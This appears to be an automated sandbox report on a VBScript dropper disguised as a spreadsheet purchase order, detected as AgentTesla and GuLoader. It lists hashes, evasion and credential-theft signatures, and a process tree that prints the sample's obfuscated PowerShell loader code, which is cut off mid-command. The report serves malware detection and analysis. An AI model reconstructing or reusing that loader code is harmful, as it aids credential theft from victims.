Edit tour
Windows
Analysis Report
PO-09784893 xlsx.vbs
Overview
General Information
| Sample Name: | PO-09784893 xlsx.vbs |
| Analysis ID: | 755440 |
| MD5: | bfa859d9ad7b23d3606ea13f525065a7 |
| SHA1: | a1b3e395dc20bcdaa866b953a08a48d0079bace2 |
| SHA256: | ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002 |
| Infos: |   |
 | |
Detection
AgentTesla, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
wscript.exe (PID: 1232 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PO-09 784893 xls x.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
cmd.exe (PID: 4760 cmdline: CMD.EXE /c echo C:\W indows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) 
powershell.exe (PID: 416 cmdline: C:\Windows \syswow64\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Saudiarab iske = """ KoAEldMedP o-CeTphySu pLnePh Eg- FrTFoyCeps peGrDTeefa fSaiRenSpi PltSeiUfoS lnRa Je'Dr uBlsLiiMin IngAx AjSm oyTesZatIn eNemUg;Spu LesUniSonU ngMu TrSPo yelsIntHae KomTr.SvRK iuHenHatEg iSimKaeSh. MoICanPitO xeterStoFe pTeSAreEfr SkvFoishcG aeBesFo;Fo pKouBabSel StihocLv M asAftTraRu tSeiBecad MecVelSaaX ysAusBr Os TSehLiwBua KorHutAbnB eeBesBusUn 1Ce Sa{Tr[ MaDAnlOmlS pIVemArpSu oSerUttFr( St`"""PeAU nDOoVEdASt PunIFo3Nd2 La.cuDGeLr uLCi`"""Cl )Bl]Brpasu VibBolIsiu dcWa UnsBe tSuaImtAfi FucBi HaeS lxTotboeTj rSunKt rei VinSotTu S pGReeAftUd SoveLarUdv CoiVacTieS kKSteSayCi NInaWempre Ta(NoiNong rtCo OmNAn oTayMoiCas PllMa,GriA pnIntAl Al SSelLagSpt Sm6Pe9Fo,B iiUrnBetPi KrAIsfFif LiainlPo,m aiBenMotTr AsbTeaGag LaaNy)Ma;S c[SoDChlDe lNgIGomMip tioVarkutP a(Sa`"""Sk gWhdBoiSe3 Vi2Pe`"""S n)Ka]BepKr uRabKllIbi FecSl FosB etAdaArtGr iHvcEm Dre HaxSatSeeA srBrnDa Aa iafnLotOv BeGNaeSotH jCamlRgiBu pSaRmagCon Re(SkiBanR atHe KoMEk uTalLa,Sti aunCetEt T rGMagpyeUn gAnuFi)Wo; Ub[UbDCalE xlStIRomCi pReoCarDyt Tr(Se`"""c akDieSarSe nPleMalbi3 Tr2si`"""T r)Be]JopBr uYabSolAui LacDi DisL jtSkaEmtTu iOvcBe Ate rexSttDreA trFonWe Fl IUnnpatTaP sttVerAr S aEpinLsuMe mUnSHayAbs DotaseTumS pLDroAdcVo aSllSteDks BaWSa(RauS viOpnAltko MevPe1du, MoiUnnHete r PlvSn2Ta )Du;He[CaD FolGylRaIE cmArpAnoBr rQutFe(Li` """SykBaes kravnKaeMi lSk3Mo2de` """Di)Fa]P rpCouBebAn lAfiHycUn AlsHjtHyaD rtMiiUncPi CeeStxKyt KaeAlrKona c ariBlnCa tse HuGSil PsoSebEfaP llEmDMaeSa lHeeSatBre prASmtGuoF imUn(PuiAe nFotDr TeP TrrtleDe1T o5Sa1Co)Sk ;ha[BaDEvl EulTrIDemH opSaoFarNo tTr(Ca`""" AkgPidPliF i3Sc2Re`"" "Aa)Da]Sap EkuApbTalR eiHacPr No soptSraSkt StiSqcAk E neAaxSptFo eTarDenSp AriSenOvtB e FlSFotEn runoAekShe BoABlnTadP aFGeiSolAn lblPOsaAvt unhPr(DiiD dnArtKl Ac EKrtLuhWiy UnlHj8Bl7D u)Bi;Qu[No DKrlUnlEkI ApmEmpSyoi nrGltCy(Sa `"""seuMos PeeafrPa3B l2In`"""Ko )Un]Jrpdiu RebSklNoiS ncSc SpsFu tstaSetFai klcMe UeeD exUdtCoeUn rJanSt ini NonFltRh G rCInlSkoIn sBiePyCDal SuiMopEtbE noTaaTarBe dPa(Ku)Un; Yn[ChDAglL rlOtICamCo pSaoGhrmat Ba(Sp`"""P awTriArnRe sGapDeoAno SplTi.BrdE xrObvSp`"" "Un)Dr]Opp HeuInbUnlC eiCocSt Un sSetCeaFot DiistcMe S tePaxwatla eBrrRenOv PaiStnCotR u PlSEncLu hTeeNodTru talDaedrJM aoPrbTr(Be itynOltkl KnUFanAfoK ovCoeStrEl 2Br2Kl6Re, IniNonRetK o PiaMikWe tStiWa)Mu; Dd[AfDUnlS llspIVomRe pNooTrrCht Ol(Cy`"""G eAAnDPrVEg ALiPSeIFo3 Sp2Re.RyDO vLAjLRe`"" "Do)St]Typ NauRabMelP oilocBu Pl sFitMiapat SciPecTa D ieStxBotDr eHurmenAl MliFanBltC i TrQMouFa eErrAryVoS HaeKorKrvT siLecKueFa CudoAfnPrf liiSugHe(M uiFonpitHo prRTheEng oflEseatrF i,LiiInnGr tFu opCEno gasAc0Ti,B